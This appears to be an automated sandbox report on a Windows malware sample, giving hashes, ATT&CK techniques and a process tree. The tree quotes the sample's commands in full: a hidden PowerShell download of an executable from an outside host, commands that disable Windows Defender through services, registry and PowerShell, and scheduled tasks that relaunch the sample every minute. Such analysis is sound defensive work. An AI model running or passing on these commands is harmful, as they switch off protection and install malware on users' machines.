db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
24-12-2024 08:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
Size

126KB
MD5

7176b040816932541eb9c2b91d90b29b
SHA1

137a9c4620366caff2a1d1c297b6ae8c6d28761d
SHA256

db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
SHA512

1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
SSDEEP

3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn

Score

10^/10

evasion execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Blocklisted process makes network request 6 IoCs

flow	pid	Process
5	2724	powershell.exe
6	2724	powershell.exe
8	1796	powershell.exe
9	1796	powershell.exe
11	2544	powershell.exe
12	2544	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2724	powershell.exe
1796	powershell.exe
2544	powershell.exe
2556	powershell.exe
2872	powershell.exe
1556	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
600	db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
2884	db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe

Loads dropped DLL 1 IoCs

pid	Process
2964	taskeng.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2660	sc.exe
2992	sc.exe
1292	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2792	schtasks.exe
2948	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2556	powershell.exe
2724	powershell.exe
2872	powershell.exe
1796	powershell.exe
1556	powershell.exe
2544	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2160 wrote to memory of 1732	2160	db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe	30
PID 2160 wrote to memory of 1732	2160	db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe	30
PID 2160 wrote to memory of 1732	2160	db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe	30
PID 1732 wrote to memory of 2556	1732	cmd.exe	32
PID 1732 wrote to memory of 2556	1732	cmd.exe	32
PID 1732 wrote to memory of 2556	1732	cmd.exe	32
PID 1732 wrote to memory of 2724	1732	cmd.exe	33
PID 1732 wrote to memory of 2724	1732	cmd.exe	33
PID 1732 wrote to memory of 2724	1732	cmd.exe	33
PID 1732 wrote to memory of 2764	1732	cmd.exe	34
PID 1732 wrote to memory of 2764	1732	cmd.exe	34
PID 1732 wrote to memory of 2764	1732	cmd.exe	34
PID 1732 wrote to memory of 2304	1732	cmd.exe	35
PID 1732 wrote to memory of 2304	1732	cmd.exe	35
PID 1732 wrote to memory of 2304	1732	cmd.exe	35
PID 1732 wrote to memory of 2792	1732	cmd.exe	36
PID 1732 wrote to memory of 2792	1732	cmd.exe	36
PID 1732 wrote to memory of 2792	1732	cmd.exe	36
PID 1732 wrote to memory of 2960	1732	cmd.exe	37
PID 1732 wrote to memory of 2960	1732	cmd.exe	37
PID 1732 wrote to memory of 2960	1732	cmd.exe	37
PID 1732 wrote to memory of 2948	1732	cmd.exe	38
PID 1732 wrote to memory of 2948	1732	cmd.exe	38
PID 1732 wrote to memory of 2948	1732	cmd.exe	38
PID 1732 wrote to memory of 2660	1732	cmd.exe	39
PID 1732 wrote to memory of 2660	1732	cmd.exe	39
PID 1732 wrote to memory of 2660	1732	cmd.exe	39
PID 1732 wrote to memory of 2916	1732	cmd.exe	40
PID 1732 wrote to memory of 2916	1732	cmd.exe	40
PID 1732 wrote to memory of 2916	1732	cmd.exe	40
PID 2916 wrote to memory of 2452	2916	net.exe	41
PID 2916 wrote to memory of 2452	2916	net.exe	41
PID 2916 wrote to memory of 2452	2916	net.exe	41
PID 1732 wrote to memory of 2952	1732	cmd.exe	42
PID 1732 wrote to memory of 2952	1732	cmd.exe	42
PID 1732 wrote to memory of 2952	1732	cmd.exe	42
PID 1732 wrote to memory of 2680	1732	cmd.exe	43
PID 1732 wrote to memory of 2680	1732	cmd.exe	43
PID 1732 wrote to memory of 2680	1732	cmd.exe	43
PID 2964 wrote to memory of 600	2964	taskeng.exe	46
PID 2964 wrote to memory of 600	2964	taskeng.exe	46
PID 2964 wrote to memory of 600	2964	taskeng.exe	46
PID 600 wrote to memory of 2620	600	db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe	47
PID 600 wrote to memory of 2620	600	db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe	47
PID 600 wrote to memory of 2620	600	db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe	47
PID 2620 wrote to memory of 2872	2620	cmd.exe	49
PID 2620 wrote to memory of 2872	2620	cmd.exe	49
PID 2620 wrote to memory of 2872	2620	cmd.exe	49
PID 2620 wrote to memory of 1796	2620	cmd.exe	50
PID 2620 wrote to memory of 1796	2620	cmd.exe	50
PID 2620 wrote to memory of 1796	2620	cmd.exe	50
PID 2620 wrote to memory of 2060	2620	cmd.exe	51
PID 2620 wrote to memory of 2060	2620	cmd.exe	51
PID 2620 wrote to memory of 2060	2620	cmd.exe	51
PID 2620 wrote to memory of 2996	2620	cmd.exe	52
PID 2620 wrote to memory of 2996	2620	cmd.exe	52
PID 2620 wrote to memory of 2996	2620	cmd.exe	52
PID 2620 wrote to memory of 3004	2620	cmd.exe	53
PID 2620 wrote to memory of 3004	2620	cmd.exe	53
PID 2620 wrote to memory of 3004	2620	cmd.exe	53
PID 2620 wrote to memory of 2992	2620	cmd.exe	54
PID 2620 wrote to memory of 2992	2620	cmd.exe	54
PID 2620 wrote to memory of 2992	2620	cmd.exe	54
PID 2620 wrote to memory of 3056	2620	cmd.exe	55

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2764	attrib.exe
2060	attrib.exe
352	attrib.exe

C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
"C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2160
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AD21.tmp\AD22.tmp\AD23.bat C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2724
- - C:\Windows\system32\attrib.exe
    attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
    3⤵
    - Views/modifies file attributes
    PID:2764
- - C:\Windows\system32\schtasks.exe
    schtasks /query /TN "RunRedditLogon"
    3⤵
    PID:2304
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe" /sc onlogon /rl highest /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2792
- - C:\Windows\system32\schtasks.exe
    schtasks /query /TN "RunRedditMinute"
    3⤵
    PID:2960
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe" /sc minute /mo 1 /rl highest /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2948
- - C:\Windows\system32\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:2660
- - C:\Windows\system32\net.exe
    net stop WinDefend
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2916
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:2452
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:2952
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2680

C:\Windows\system32\taskeng.exe
taskeng.exe {42CCBF56-5EB8-4C16-B60F-26ECE60BBBC4} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2964
- C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
  C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:600
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5C53.tmp\5C54.tmp\5C55.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1796
  - - C:\Windows\system32\attrib.exe
      attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
      4⤵
      Views/modifies file attributes
      PID:2060
  - - C:\Windows\system32\schtasks.exe
      schtasks /query /TN "RunRedditLogon"
      4⤵
      PID:2996
  - - C:\Windows\system32\schtasks.exe
      schtasks /query /TN "RunRedditMinute"
      4⤵
      PID:3004
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:2992
  - - C:\Windows\system32\net.exe
      net stop WinDefend
      4⤵
      PID:3056
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop WinDefend
        5⤵
        
        PID:2388
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:2408
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2396
- C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
  C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
  2⤵
  - Executes dropped EXE
  PID:2884
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4624.tmp\4625.tmp\4626.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
    3⤵
    PID:704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2544
  - - C:\Windows\system32\attrib.exe
      attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
      4⤵
      Views/modifies file attributes
      PID:352
  - - C:\Windows\system32\schtasks.exe
      schtasks /query /TN "RunRedditLogon"
      4⤵
      PID:1004
  - - C:\Windows\system32\schtasks.exe
      schtasks /query /TN "RunRedditMinute"
      4⤵
      PID:1772
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:1292
  - - C:\Windows\system32\net.exe
      net stop WinDefend
      4⤵
      PID:1316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop WinDefend
        5⤵
        
        PID:1108
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:904
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AD21.tmp\AD22.tmp\AD23.bat

Filesize
2KB

MD5
c0e9bc2dfff6e08df8196809b9bbf253

SHA1
006e88ea359145c40a6bbca55e6f21b387999255

SHA256
43c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11

SHA512
5b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c

Download Submit
C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe

Filesize
126KB

MD5
7176b040816932541eb9c2b91d90b29b

SHA1
137a9c4620366caff2a1d1c297b6ae8c6d28761d

SHA256
db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

SHA512
1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
67c9086a19f0c9d5d521824490d3854f

SHA1
3803d444f21890aecc28bd9a9395dc5ff8a8a1e1

SHA256
83d92cd046febc510661abb3f85023bbac6a186416723fffa9a88dbcdc145d36

SHA512
cd9707bddd9140c69f0da3d64644eb6d92e1c1eb55505028eaa6b7ea6f8b1740792839028ea6f4f0aba7d426d18e770bbb65284e37cdea4c18af20e143ee736e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e56da256038711721f27d46e5b3dad2b

SHA1
6843b02b6bdf5b2fe06c1ad938ac5c9deb51a487

SHA256
88febd8b13410728a4db111b1094465ab6e0f641fff0b8e94b5aa7d691116180

SHA512
6b29f846f0becab5a69beee780812e84c74d109ec6a7fca3ffcf37cbfb8beb2366b963afcf9c8109e924646028431b210b54287b62da47a65a7a39e54b6c9869

Download Submit
memory/2556-13-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download
memory/2556-12-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download
memory/2556-11-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download
memory/2556-9-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download
memory/2556-14-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download
memory/2556-10-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download
memory/2556-7-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2556-8-0x00000000022A0000-0x00000000022A8000-memory.dmp

Filesize
32KB

Download
memory/2556-6-0x000007FEF5E2E000-0x000007FEF5E2F000-memory.dmp

Filesize
4KB

Download
memory/2724-20-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2724-21-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download